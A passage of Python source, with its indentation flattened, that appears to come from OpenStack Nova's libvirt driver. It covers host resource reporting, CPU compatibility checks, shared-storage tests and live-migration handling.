LOG.info(_("libvirt can't find a domain with id: %s") % dom_id)
continue
except Exception:
continue
ret = doc.findall('./devices/disk')
for node in ret:
if node.get('type') != 'block':
continue
for child in node.getchildren():
if child.tag == 'source':
devices.append(child.get('dev'))
return devices
def get_disks(self, instance_name):
"""
Note that this function takes an instance name.
Returns a list of all block devices for this domain.
"""
domain = self._lookup_by_name(instance_name)
xml = domain.XMLDesc(0)
try:
doc = etree.fromstring(xml)
except Exception:
return []
return filter(bool,
[target.get("dev")
for target in doc.findall('devices/disk/target')])
def get_interfaces(self, xml):
"""
Note that this function takes a domain xml.
Returns a list of all network interfaces for this instance.
"""
doc = None
try:
doc = etree.fromstring(xml)
except Exception:
return []
interfaces = []
ret = doc.findall('./devices/interface')
for node in ret:
devdst = None
for child in list(node):
if child.tag == 'target':
devdst = child.attrib['dev']
if devdst is None:
continue
interfaces.append(devdst)
return interfaces
def _get_cpuset_ids(self):
"""
        Parse the vcpu_pin_set config.
        Returns a list of pcpu ids that can be used by instances.
"""
cpuset_ids = set()
cpuset_reject_ids = set()
for rule in CONF.vcpu_pin_set.split(','):
rule = rule.strip()
# Handle multi ','
if len(rule) < 1:
continue
# Note the count limit in the .split() call
range_parts = rule.split('-', 1)
if len(range_parts) > 1:
# So, this was a range; start by converting the parts to ints
try:
start, end = [int(p.strip()) for p in range_parts]
except ValueError:
raise exception.Invalid(_("Invalid range expression %r")
% rule)
# Make sure it's a valid range
if start > end:
raise exception.Invalid(_("Invalid range expression %r")
% rule)
# Add available pcpu ids to set
cpuset_ids |= set(range(start, end + 1))
elif rule[0] == '^':
# Not a range, the rule is an exclusion rule; convert to int
try:
cpuset_reject_ids.add(int(rule[1:].strip()))
except ValueError:
raise exception.Invalid(_("Invalid exclusion "
"expression %r") % rule)
else:
# OK, a single PCPU to include; convert to int
try:
cpuset_ids.add(int(rule))
except ValueError:
raise exception.Invalid(_("Invalid inclusion "
"expression %r") % rule)
# Use sets to handle the exclusion rules for us
cpuset_ids -= cpuset_reject_ids
if not cpuset_ids:
raise exception.Invalid(_("No CPUs available after parsing %r") %
CONF.vcpu_pin_set)
# This will convert the set to a sorted list for us
return sorted(cpuset_ids)
def get_vcpu_total(self):
"""Get available vcpu number of physical computer.
:returns: the number of cpu core instances can be used.
"""
if self._vcpu_total != 0:
return self._vcpu_total
try:
total_pcpus = self._conn.getInfo()[2]
except libvirt.libvirtError:
LOG.warn(_("Cannot get the number of cpu, because this "
"function is not implemented for this platform. "))
return 0
if CONF.vcpu_pin_set is None:
self._vcpu_total = total_pcpus
return self._vcpu_total
available_ids = self._get_cpuset_ids()
if available_ids[-1] >= total_pcpus:
raise exception.Invalid(_("Invalid vcpu_pin_set config, "
"out of hypervisor cpu range."))
self._vcpu_total = len(available_ids)
return self._vcpu_total
def get_memory_mb_total(self):
"""Get the total memory size(MB) of physical computer.
:returns: the total amount of memory(MB).
"""
return self._conn.getInfo()[1]
@staticmethod
def get_local_gb_info():
"""Get local storage info of the compute node in GB.
:returns: A dict containing:
:total: How big the overall usable filesystem is (in gigabytes)
:free: How much space is free (in gigabytes)
:used: How much space is used (in gigabytes)
"""
if CONF.libvirt_images_type == 'lvm':
info = libvirt_utils.get_volume_group_info(
CONF.libvirt_images_volume_group)
else:
info = libvirt_utils.get_fs_info(CONF.instances_path)
for (k, v) in info.iteritems():
info[k] = v / unit.Gi
return info
def get_vcpu_used(self):
"""Get vcpu usage number of physical computer.
:returns: The total number of vcpu that currently used.
"""
total = 0
if CONF.libvirt_type == 'lxc':
return total + 1
dom_ids = self.list_instance_ids()
for dom_id in dom_ids:
try:
dom = self._lookup_by_id(dom_id)
vcpus = dom.vcpus()
if vcpus is None:
LOG.debug(_("couldn't obtain the vpu count from domain id:"
" %s") % dom_id)
else:
total += len(vcpus[1])
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s") % dom_id)
continue
            # NOTE(gtt116): give other tasks a chance to run.
greenthread.sleep(0)
return total
def get_memory_mb_used(self):
"""Get the free memory size(MB) of physical computer.
:returns: the total usage of memory(MB).
"""
if sys.platform.upper() not in ['LINUX2', 'LINUX3']:
return 0
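        # /proc/meminfo is parsed into whitespace-separated tokens; the value
        # (in kB) follows each 'MemFree:'/'Buffers:'/'Cached:' label.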
m = open('/proc/meminfo').read().split()
idx1 = m.index('MemFree:')
idx2 = m.index('Buffers:')
idx3 = m.index('Cached:')
if CONF.libvirt_type == 'xen':
used = 0
for domain_id in self.list_instance_ids():
try:
dom_mem = int(self._lookup_by_id(domain_id).info()[2])
except exception.InstanceNotFound:
LOG.info(_("libvirt can't find a domain with id: %s")
% domain_id)
continue
                # dom0 is accounted for separately below
if domain_id != 0:
used += dom_mem
else:
                    # the memory reported by dom0 is greater than what it
                    # is actually using, so subtract free/buffers/cached
used += (dom_mem -
(int(m[idx1 + 1]) +
int(m[idx2 + 1]) +
int(m[idx3 + 1])))
# Convert it to MB
return used / 1024
else:
avail = (int(m[idx1 + 1]) + int(m[idx2 + 1]) + int(m[idx3 + 1]))
# Convert it to MB
return self.get_memory_mb_total() - avail / 1024
def get_hypervisor_type(self):
"""Get hypervisor type.
:returns: hypervisor type (ex. qemu)
"""
return self._conn.getType()
def get_hypervisor_version(self):
"""Get hypervisor version.
:returns: hypervisor version (ex. 12003)
"""
# NOTE(justinsb): getVersion moved between libvirt versions
# Trying to do be compatible with older versions is a lost cause
# But ... we can at least give the user a nice message
method = getattr(self._conn, 'getVersion', None)
if method is None:
raise exception.NovaException(_("libvirt version is too old"
" (does not support getVersion)"))
# NOTE(justinsb): If we wanted to get the version, we could:
# method = getattr(libvirt, 'getVersion', None)
# NOTE(justinsb): This would then rely on a proper version check
return method()
def get_hypervisor_hostname(self):
"""Returns the hostname of the hypervisor."""
hostname = self._conn.getHostname()
if not hasattr(self, '_hypervisor_hostname'):
self._hypervisor_hostname = hostname
elif hostname != self._hypervisor_hostname:
LOG.error(_('Hostname has changed from %(old)s '
'to %(new)s. A restart is required to take effect.'
) % {'old': self._hypervisor_hostname,
'new': hostname})
return self._hypervisor_hostname
def get_instance_capabilities(self):
"""Get hypervisor instance capabilities
Returns a list of tuples that describe instances the
hypervisor is capable of hosting. Each tuple consists
of the triplet (arch, hypervisor_type, vm_mode).
:returns: List of tuples describing instance capabilities
"""
caps = self.get_host_capabilities()
instance_caps = list()
for g in caps.guests:
for dt in g.domtype:
instance_cap = (g.arch, dt, g.ostype)
instance_caps.append(instance_cap)
return instance_caps
def get_cpu_info(self):
"""Get cpuinfo information.
Obtains cpu feature from virConnect.getCapabilities,
and returns as a json string.
:return: see above description
"""
caps = self.get_host_capabilities()
cpu_info = dict()
cpu_info['arch'] = caps.host.cpu.arch
cpu_info['model'] = caps.host.cpu.model
cpu_info['vendor'] = caps.host.cpu.vendor
topology = dict()
topology['sockets'] = caps.host.cpu.sockets
topology['cores'] = caps.host.cpu.cores
topology['threads'] = caps.host.cpu.threads
cpu_info['topology'] = topology
features = list()
for f in caps.host.cpu.features:
features.append(f.name)
cpu_info['features'] = features
# TODO(berrange): why do we bother converting the
# libvirt capabilities XML into a special JSON format ?
# The data format is different across all the drivers
# so we could just return the raw capabilities XML
# which 'compare_cpu' could use directly
#
# That said, arch_filter.py now seems to rely on
# the libvirt drivers format which suggests this
# data format needs to be standardized across drivers
return jsonutils.dumps(cpu_info)
def _get_pcidev_info(self, devname):
"""Returns a dict of PCI device."""
def _get_device_type(cfgdev):
"""Get a PCI device's device type.
            An assignable PCI device can be a normal PCI device,
            an SR-IOV Physical Function (PF), or an SR-IOV Virtual
            Function (VF). Only normal PCI devices and SR-IOV VFs
            are assignable, while SR-IOV PFs are always owned by
            the hypervisor.
            Note that a PCI device with SR-IOV capability that is not
            enabled is reported as a normal PCI device.
"""
for fun_cap in cfgdev.pci_capability.fun_capability:
if len(fun_cap.device_addrs) != 0:
if fun_cap.type == 'virt_functions':
return {'dev_type': 'type-PF'}
if fun_cap.type == 'phys_function':
return {'dev_type': 'type-VF',
'phys_function': fun_cap.device_addrs}
return {'dev_type': 'type-PCI'}
virtdev = self._conn.nodeDeviceLookupByName(devname)
xmlstr = virtdev.XMLDesc(0)
cfgdev = vconfig.LibvirtConfigNodeDevice()
cfgdev.parse_str(xmlstr)
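        # Format the PCI address as domain:bus:slot.function,
        # e.g. '0000:04:00.1'.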
address = "%04x:%02x:%02x.%1x" % (
cfgdev.pci_capability.domain,
cfgdev.pci_capability.bus,
cfgdev.pci_capability.slot,
cfgdev.pci_capability.function)
device = {
"dev_id": cfgdev.name,
"address": address,
"product_id": cfgdev.pci_capability.product_id[2:6],
"vendor_id": cfgdev.pci_capability.vendor_id[2:6],
}
        # 'label' is required by the database model
device['label'] = 'label_%(vendor_id)s_%(product_id)s' % device
device.update(_get_device_type(cfgdev))
return device
def _pci_device_assignable(self, device):
if device['dev_type'] == 'type-PF':
return False
return self.dev_filter.device_assignable(device)
def get_pci_passthrough_devices(self):
"""Get host pci devices information.
Obtains pci devices information from libvirt, and returns
as a json string.
Each device information is a dictionary, with mandatory keys
of 'address', 'vendor_id', 'product_id', 'dev_type', 'dev_id',
'label' and other optional device specific information.
        Refer to objects/pci_device.py for more details on these keys.
:returns: a list of the assignable pci devices information
"""
pci_info = []
dev_names = self._conn.listDevices('pci', 0) or []
for name in dev_names:
pci_dev = self._get_pcidev_info(name)
if self._pci_device_assignable(pci_dev):
pci_info.append(pci_dev)
return jsonutils.dumps(pci_info)
def get_all_volume_usage(self, context, compute_host_bdms):
"""Return usage info for volumes attached to vms on
a given host.
"""
vol_usage = []
for instance_bdms in compute_host_bdms:
instance = instance_bdms['instance']
for bdm in instance_bdms['instance_bdms']:
vol_stats = []
mountpoint = bdm['device_name']
if mountpoint.startswith('/dev/'):
mountpoint = mountpoint[5:]
volume_id = bdm['volume_id']
LOG.debug(_("Trying to get stats for the volume %s"),
volume_id)
vol_stats = self.block_stats(instance['name'], mountpoint)
if vol_stats:
stats = dict(volume=volume_id,
instance=instance,
rd_req=vol_stats[0],
rd_bytes=vol_stats[1],
wr_req=vol_stats[2],
wr_bytes=vol_stats[3],
flush_operations=vol_stats[4])
LOG.debug(
_("Got volume usage stats for the volume=%(volume)s,"
" instance=%(instance)s, rd_req=%(rd_req)d,"
" rd_bytes=%(rd_bytes)d, wr_req=%(wr_req)d,"
" wr_bytes=%(wr_bytes)d")
% stats)
vol_usage.append(stats)
return vol_usage
def block_stats(self, instance_name, disk):
"""
Note that this function takes an instance name.
"""
try:
domain = self._lookup_by_name(instance_name)
return domain.blockStats(disk)
except libvirt.libvirtError as e:
errcode = e.get_error_code()
LOG.info(_('Getting block stats failed, device might have '
'been detached. Instance=%(instance_name)s '
'Disk=%(disk)s Code=%(errcode)s Error=%(e)s'),
{'instance_name': instance_name, 'disk': disk,
'errcode': errcode, 'e': e})
except exception.InstanceNotFound:
LOG.info(_('Could not find domain in libvirt for instance %s. '
'Cannot get block stats for device'), instance_name)
def interface_stats(self, instance_name, interface):
"""
Note that this function takes an instance name.
"""
domain = self._lookup_by_name(instance_name)
return domain.interfaceStats(interface)
def get_console_pool_info(self, console_type):
#TODO(mdragon): console proxy should be implemented for libvirt,
# in case someone wants to use it with kvm or
# such. For now return fake data.
return {'address': '127.0.0.1',
'username': 'fakeuser',
'password': 'fakepassword'}
def refresh_security_group_rules(self, security_group_id):
self.firewall_driver.refresh_security_group_rules(security_group_id)
def refresh_security_group_members(self, security_group_id):
self.firewall_driver.refresh_security_group_members(security_group_id)
def refresh_instance_security_rules(self, instance):
self.firewall_driver.refresh_instance_security_rules(instance)
def refresh_provider_fw_rules(self):
self.firewall_driver.refresh_provider_fw_rules()
def get_available_resource(self, nodename):
"""Retrieve resource information.
This method is called when nova-compute launches, and
as part of a periodic task that records the results in the DB.
:param nodename: will be put in PCI device
:returns: dictionary containing resource info
"""
# Temporary: convert supported_instances into a string, while keeping
# the RPC version as JSON. Can be changed when RPC broadcast is removed
stats = self.host_state.get_host_stats(refresh=True)
stats['supported_instances'] = jsonutils.dumps(
stats['supported_instances'])
return stats
def check_instance_shared_storage_local(self, context, instance):
dirpath = libvirt_utils.get_instance_path(instance)
if not os.path.exists(dirpath):
return None
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug(_("Creating tmpfile %s to verify with other "
"compute node that the instance is on "
"the same shared storage.") % tmp_file)
os.close(fd)
return {"filename": tmp_file}
def check_instance_shared_storage_remote(self, context, data):
return os.path.exists(data['filename'])
def check_instance_shared_storage_cleanup(self, context, data):
fileutils.delete_if_exists(data["filename"])
def check_can_live_migrate_destination(self, context, instance,
src_compute_info, dst_compute_info,
block_migration=False,
disk_over_commit=False):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing:
:filename: name of the tmpfile under CONF.instances_path
:block_migration: whether this is block migration
:disk_over_commit: disk-over-commit factor on dest host
:disk_available_mb: available disk space on dest host
"""
disk_available_mb = None
if block_migration:
disk_available_gb = dst_compute_info['disk_available_least']
disk_available_mb = \
(disk_available_gb * 1024) - CONF.reserved_host_disk_mb
# Compare CPU
source_cpu_info = src_compute_info['cpu_info']
self._compare_cpu(source_cpu_info)
# Create file on storage, to be checked on source host
filename = self._create_shared_storage_test_file()
return {"filename": filename,
"block_migration": block_migration,
"disk_over_commit": disk_over_commit,
"disk_available_mb": disk_available_mb}
def check_can_live_migrate_destination_cleanup(self, context,
dest_check_data):
"""Do required cleanup on dest host after check_can_live_migrate calls
:param context: security context
"""
filename = dest_check_data["filename"]
self._cleanup_shared_storage_test_file(filename)
def check_can_live_migrate_source(self, context, instance,
dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param context: security context
:param instance: nova.db.sqlalchemy.models.Instance
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
# Checking shared storage connectivity
# if block migration, instances_paths should not be on shared storage.
source = CONF.host
filename = dest_check_data["filename"]
block_migration = dest_check_data["block_migration"]
is_volume_backed = dest_check_data.get('is_volume_backed', False)
has_local_disks = bool(
jsonutils.loads(self.get_instance_disk_info(instance['name'])))
shared = self._check_shared_storage_test_file(filename)
if block_migration:
if shared:
reason = _("Block migration can not be used "
"with shared storage.")
raise exception.InvalidLocalStorage(reason=reason, path=source)
self._assert_dest_node_has_enough_disk(context, instance,
dest_check_data['disk_available_mb'],
dest_check_data['disk_over_commit'])
elif not shared and (not is_volume_backed or has_local_disks):
reason = _("Live migration can not be used "
"without shared storage.")
raise exception.InvalidSharedStorage(reason=reason, path=source)
dest_check_data.update({"is_shared_storage": shared})
# NOTE(mikal): include the instance directory name here because it
# doesn't yet exist on the destination but we want to force that
# same name to be used
instance_path = libvirt_utils.get_instance_path(instance,
relative=True)
dest_check_data['instance_relative_path'] = instance_path
return dest_check_data
def _assert_dest_node_has_enough_disk(self, context, instance,
available_mb, disk_over_commit):
"""Checks if destination has enough disk for block migration."""
        # Libvirt supports the qcow2 disk format, which is usually
        # compressed on compute nodes.
        # The real (compressed) disk image may grow up to the "virtual
        # disk size", which is the maximum disk size.
        # (See qemu-img info path-to-disk)
        # The destination host is considered to have enough disk space when
        # real disk size < available disk size if disk_over_commit is True,
        # otherwise when virtual disk size < available disk size.
available = 0
if available_mb:
available = available_mb * unit.Mi
ret = self.get_instance_disk_info(instance['name'])
disk_infos = jsonutils.loads(ret)
necessary = 0
if disk_over_commit:
for info in disk_infos:
necessary += int(info['disk_size'])
else:
for info in disk_infos:
necessary += int(info['virt_disk_size'])
# Check that available disk > necessary disk
if (available - necessary) < 0:
reason = (_('Unable to migrate %(instance_uuid)s: '
'Disk of instance is too large(available'
' on destination host:%(available)s '
'< need:%(necessary)s)') %
{'instance_uuid': instance['uuid'],
'available': available,
'necessary': necessary})
raise exception.MigrationPreCheckError(reason=reason)
def _compare_cpu(self, cpu_info):
"""Checks the host cpu is compatible to a cpu given by xml.
"xml" must be a part of libvirt.openAuth(...).getCapabilities().
return values follows by virCPUCompareResult.
if 0 > return value, do live migration.
'http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult'
:param cpu_info: json string that shows cpu feature(see get_cpu_info())
:returns:
None. if given cpu info is not compatible to this server,
raise exception.
"""
# NOTE(berendt): virConnectCompareCPU not working for Xen
if CONF.libvirt_type == 'xen':
return 1
info = jsonutils.loads(cpu_info)
LOG.info(_('Instance launched has CPU info:\n%s') % cpu_info)
cpu = vconfig.LibvirtConfigCPU()
cpu.arch = info['arch']
cpu.model = info['model']
cpu.vendor = info['vendor']
cpu.sockets = info['topology']['sockets']
cpu.cores = info['topology']['cores']
cpu.threads = info['topology']['threads']
for f in info['features']:
cpu.add_feature(vconfig.LibvirtConfigCPUFeature(f))
u = "http://libvirt.org/html/libvirt-libvirt.html#virCPUCompareResult"
m = _("CPU doesn't have compatibility.\n\n%(ret)s\n\nRefer to %(u)s")
# unknown character exists in xml, then libvirt complains
try:
ret = self._conn.compareCPU(cpu.to_xml(), 0)
except libvirt.libvirtError as e:
with excutils.save_and_reraise_exception():
ret = unicode(e)
LOG.error(m, {'ret': ret, 'u': u})
if ret <= 0:
LOG.error(m, {'ret': ret, 'u': u})
raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
def _create_shared_storage_test_file(self):
"""Makes tmpfile under CONF.instances_path."""
dirpath = CONF.instances_path
fd, tmp_file = tempfile.mkstemp(dir=dirpath)
LOG.debug(_("Creating tmpfile %s to notify to other "
"compute nodes that they should mount "
"the same storage.") % tmp_file)
os.close(fd)
return os.path.basename(tmp_file)
def _check_shared_storage_test_file(self, filename):
"""Confirms existence of the tmpfile under CONF.instances_path.
        Returns False if the tmpfile cannot be confirmed.
"""
tmp_file = os.path.join(CONF.instances_path, filename)
if not os.path.exists(tmp_file):
return False
else:
return True
def _cleanup_shared_storage_test_file(self, filename):
"""Removes existence of the tmpfile under CONF.instances_path."""
tmp_file = os.path.join(CONF.instances_path, filename)
os.remove(tmp_file)
def ensure_filtering_rules_for_instance(self, instance, network_info,
time_module=None):
"""Ensure that an instance's filtering rules are enabled.
When migrating an instance, we need the filtering rules to
be configured on the destination host before starting the
migration.
Also, when restarting the compute service, we need to ensure
that filtering rules exist for all running services.
"""
if not time_module:
time_module = greenthread
self.firewall_driver.setup_basic_filtering(instance, network_info)
self.firewall_driver.prepare_instance_filter(instance,
network_info)
# nwfilters may be defined in a separate thread in the case
# of libvirt non-blocking mode, so we wait for completion
timeout_count = range(CONF.live_migration_retry_count)
while timeout_count:
if self.firewall_driver.instance_filter_exists(instance,
network_info):
break
timeout_count.pop()
if len(timeout_count) == 0:
msg = _('The firewall filter for %s does not exist')
raise exception.NovaException(msg % instance["name"])
time_module.sleep(1)
def filter_defer_apply_on(self):
self.firewall_driver.filter_defer_apply_on()
def filter_defer_apply_off(self):
self.firewall_driver.filter_defer_apply_off()
def live_migration(self, context, instance, dest,
post_method, recover_method, block_migration=False,
migrate_data=None):
"""Spawning live_migration operation for distributing high-load.
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params block_migration: if true, do block migration.
:params migrate_data: implementation specific params
"""
greenthread.spawn(self._live_migration, context, instance, dest,
post_method, recover_method, block_migration,
migrate_data)
def _live_migration(self, context, instance, dest, post_method,
recover_method, block_migration=False,
migrate_data=None):
"""Do live migration.
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params dest: destination host
:params post_method:
post operation method.
expected nova.compute.manager.post_live_migration.
:params recover_method:
recovery method when any exception occurs.
expected nova.compute.manager.recover_live_migration.
:params migrate_data: implementation specific params
"""
# Do live migration.
try:
if block_migration:
flaglist = CONF.block_migration_flag.split(',')
else:
flaglist = CONF.live_migration_flag.split(',')
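            # Each configured flag name (e.g. VIR_MIGRATE_UNDEFINE_SOURCE,
            # VIR_MIGRATE_PEER2PEER) is looked up on the libvirt module and
            # OR'ed into a single flags value for migrateToURI.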
flagvals = [getattr(libvirt, x.strip()) for x in flaglist]
logical_sum = reduce(lambda x, y: x | y, flagvals)
dom = self._lookup_by_name(instance["name"])
dom.migrateToURI(CONF.live_migration_uri % dest,
logical_sum,
None,
CONF.live_migration_bandwidth)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Live Migration failure: %s"), e,
instance=instance)
recover_method(context, instance, dest, block_migration)
# Waiting for completion of live_migration.
timer = loopingcall.FixedIntervalLoopingCall(f=None)
def wait_for_live_migration():
"""waiting for live migration completion."""
try:
self.get_info(instance)['state']
except exception.InstanceNotFound:
timer.stop()
post_method(context, instance, dest, block_migration,
migrate_data)
timer.f = wait_for_live_migration
timer.start(interval=0.5).wait()
def _fetch_instance_kernel_ramdisk(self, context, instance):
"""Download kernel and ramdisk for instance in instance directory."""
instance_dir = libvirt_utils.get_instance_path(instance)
if instance['kernel_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir, 'kernel'),
instance['kernel_id'],
instance['user_id'],
instance['project_id'])
if instance['ramdisk_id']:
libvirt_utils.fetch_image(context,
os.path.join(instance_dir,
'ramdisk'),
instance['ramdisk_id'],
instance['user_id'],
instance['project_id'])
def pre_live_migration(self, context, instance, block_device_info,
network_info, disk_info, migrate_data=None):
"""Preparation live migration."""
# Steps for volume backed instance live migration w/o shared storage.
is_shared_storage = True
is_volume_backed = False
is_block_migration = True
instance_relative_path = None
if migrate_data:
is_shared_storage = migrate_data.get('is_shared_storage', True)
is_volume_backed = migrate_data.get('is_volume_backed', False)
is_block_migration = migrate_data.get('block_migration', True)
instance_relative_path = migrate_data.get('instance_relative_path')
if not is_shared_storage:
# NOTE(mikal): this doesn't use libvirt_utils.get_instance_path
# because we are ensuring that the same instance directory name
# is used as was at the source
if instance_relative_path:
instance_dir = os.path.join(CONF.instances_path,
instance_relative_path)
else:
instance_dir = libvirt_utils.get_instance_path(instance)
if os.path.exists(instance_dir):
raise exception.DestinationDiskExists(path=instance_dir)
os.mkdir(instance_dir)
# Ensure images and backing files are present.
self._create_images_and_backing(context, instance, instance_dir,
disk_info)
if is_volume_backed and not (is_block_migration or is_shared_storage):
# Touch the console.log file, required by libvirt.
console_file = self._get_console_log_path(instance)
libvirt_utils.file_open(console_file, 'a').close()
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
# Establishing connection to volume server.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_info = blockinfo.get_info_from_bdm(CONF.libvirt_type, vol)
self.volume_driver_method('connect_volume',
connection_info,
disk_info)
# We call plug_vifs before the compute manager calls
# ensure_filtering_rules_for_instance, to ensure bridge is set up
        # Retrying is necessary because requests arrive continuously and
        # concurrent requests to iptables cause it to complain.
max_retry = CONF.live_migration_retry_count
for cnt in range(max_retry):
try:
self.plug_vifs(instance, network_info)
break
except processutils.ProcessExecutionError:
if cnt == max_retry - 1:
raise
else:
LOG.warn(_('plug_vifs() failed %(cnt)d. Retry up to '
'%(max_retry)d.'),
{'cnt': cnt,
'max_retry': max_retry},
instance=instance)
greenthread.sleep(1)
def _create_images_and_backing(self, context, instance, instance_dir,
disk_info_json):
"""
:params context: security context
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:params instance_dir:
instance path to use, calculated externally to handle block
migrating an instance with an old style instance path
:params disk_info_json:
json strings specified in get_instance_disk_info
"""
if not disk_info_json:
disk_info = []
else:
disk_info = jsonutils.loads(disk_info_json)
for info in disk_info:
base = os.path.basename(info['path'])
# Get image type and create empty disk image, and
# create backing file in case of qcow2.
instance_disk = os.path.join(instance_dir, base)
if not info['backing_file'] and not os.path.exists(instance_disk):
libvirt_utils.create_image(info['type'], instance_disk,
info['disk_size'])
elif info['backing_file']:
                # Creating the backing file follows the same path as
                # spawning an instance.
cache_name = os.path.basename(info['backing_file'])
image = self.image_backend.image(instance,
instance_disk,
CONF.libvirt_images_type)
image.cache(fetch_func=libvirt_utils.fetch_image,
context=context,
filename=cache_name,
image_id=instance['image_ref'],
user_id=instance['user_id'],
project_id=instance['project_id'],
size=info['virt_disk_size'])
# if image has kernel and ramdisk, just download
# following normal way.
self._fetch_instance_kernel_ramdisk(context, instance)
def post_live_migration(self, context, instance, block_device_info):
# Disconnect from volume server
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
for vol in block_device_mapping:
connection_info = vol['connection_info']
disk_dev = vol['mount_device'].rpartition("/")[2]
self.volume_driver_method('disconnect_volume',
connection_info,
disk_dev)
def post_live_migration_at_destination(self, context,
instance,
network_info,
block_migration,
block_device_info=None):
"""Post operation of live migration at destination host.
:param context: security context
:param instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:param network_info: instance network information
:param block_migration: if true, post operation of block_migration.
"""
# Define migrated instance, otherwise, suspend/destroy does not work.
dom_list = self._conn.listDefinedDomains()
if instance["name"] not in dom_list:
# In case of block migration, destination does not have
# libvirt.xml
disk_info = blockinfo.get_disk_info(CONF.libvirt_type,
instance)
            self.to_xml(context, instance, network_info, disk_info,
                        block_device_info=block_device_info,
                        write_to_disk=True)
            # to_xml() writes out libvirt.xml, but its output cannot be
            # passed to defineXML() directly since it does not include the
            # uuid, so re-define the domain from its existing definition.
dom = self._lookup_by_name(instance["name"])
self._conn.defineXML(dom.XMLDesc(0))
def get_instance_disk_info(self, instance_name, xml=None,
block_device_info=None):
"""Preparation block migration.
:params instance:
nova.db.sqlalchemy.models.Instance object
instance object that is migrated.
:return:
json strings with below format::
"[{'path':'disk', 'type':'raw',
'virt_disk_size':'10737418240',
'backing_file':'backing_file',
'disk_size':'83886080'},...]"
"""
# NOTE (rmk): Passing the domain XML into this function is optional.
# When it is not passed, we attempt to extract it from
# the pre-existing definition.
if xml is None:
try:
virt_dom = self._lookup_by_name(instance_name)
xml = virt_dom.XMLDesc(0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
msg = (_('Error from libvirt while getting description of '
'%(instance_name)s: [Error Code %(error_code)s] '
'%(ex)s') %
{'instance_name': instance_name,
'error_code': error_code,
'ex': ex})
LOG.warn(msg)
raise exception.InstanceNotFound(instance_id=instance_name)
# NOTE (rmk): When block_device_info is provided, we will use it to
# filter out devices which are actually volumes.
block_device_mapping = driver.block_device_info_get_mapping(
block_device_info)
volume_devices = set()
for vol in block_device_mapping:
disk_dev = vol['mount_device'].rpartition("/")[2]
volume_devices.add(disk_dev)
disk_info = []
doc = etree.fromstring(xml)
disk_nodes = doc.findall('.//devices/disk')
path_nodes = doc.findall('.//devices/disk/source')
driver_nodes = doc.findall('.//devices/disk/driver')
target_nodes = doc.findall('.//devices/disk/target')
for cnt, path_node in enumerate(path_nodes):
disk_type = disk_nodes[cnt].get('type')
path = path_node.get('file')
target = target_nodes[cnt].attrib['dev']
if not path:
LOG.debug(_('skipping disk for %s as it does not have a path'),
instance_name)
continue
if disk_type != 'file':
LOG.debug(_('skipping %s since it looks like volume'), path)
continue
if target in volume_devices:
LOG.debug(_('skipping disk %(path)s (%(target)s) as it is a '
'volume'), {'path': path, 'target': target})
continue
# get the real disk size or
# raise a localized error if image is unavailable
dk_size = int(os.path.getsize(path))
disk_type = driver_nodes[cnt].get('type')
if disk_type == "qcow2":
backing_file = libvirt_utils.get_disk_backing_file(path)
virt_size = disk.get_disk_size(path)
over_commit_size = int(virt_size) - dk_size
else:
backing_file = ""
virt_size = 0
over_commit_size = 0
disk_info.append({'type': disk_type,
'path': path,
'virt_disk_size': virt_size,
'backing_file': backing_file,
'disk_size': dk_size,
'over_committed_disk_size': over_commit_size})
return jsonutils.dumps(disk_info)
def get_disk_over_committed_size_total(self):
"""Return total over committed disk size for all instances."""
        # Disk size that all instances use: virtual_size - disk_size
instances_name = self.list_instances()
disk_over_committed_size = 0
for i_name in instances_name:
try:
disk_infos = jsonutils.loads(
self.get_instance_disk_info(i_name))
for info in disk_infos:
disk_over_committed_size += int(
info['over_committed_disk_size'])
except OSError as e:
if e.errno == errno.ENOENT:
LOG.error(_('Getting disk size of %(i_name)s: %(e)s'),
{'i_name': i_name, 'e': e})
else:
raise
except exception.InstanceNotFound:
# Instance was deleted during the check so ignore it
pass
            # NOTE(gtt116): give other tasks a chance to run.
greenthread.sleep(0)
return disk_over_committed_size
def unfilter_instance(self, instance, network_info):
"""See comments of same method in firewall_driver."""
self.firewall_driver.unfilter_instance(instance,
network_info=network_info)
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
        If 'refresh' is True, update the stats first.
"""
return self.host_state.get_host_stats(refresh=refresh)
def get_host_uptime(self, host):
"""Returns the result of calling "uptime"."""
#NOTE(dprince): host seems to be ignored for this call and in
# other compute drivers as well. Perhaps we should remove it?
out, err = utils.execute('env', 'LANG=C', 'uptime')
return out
def manage_image_cache(self, context, all_instances):
"""Manage the local cache of images."""
self.image_cache_manager.verify_base_images(context, all_instances)
def _cleanup_remote_migration(self, dest, inst_base, inst_base_resize,
shared_storage=False):
"""Used only for cleanup in case migrate_disk_and_power_off fails."""
try:
if os.path.exists(inst_base_resize):
utils.execute('rm', '-rf', inst_base)
utils.execute('mv', inst_base_resize, inst_base)
if not shared_storage:
utils.execute('ssh', dest, 'rm', '-rf', inst_base)
except Exception:
pass
def _is_storage_shared_with(self, dest, inst_base):
# NOTE (rmk): There are two methods of determining whether we are
# on the same filesystem: the source and dest IP are the
# same, or we create a file on the dest system via SSH
# and check whether the source system can also see it.
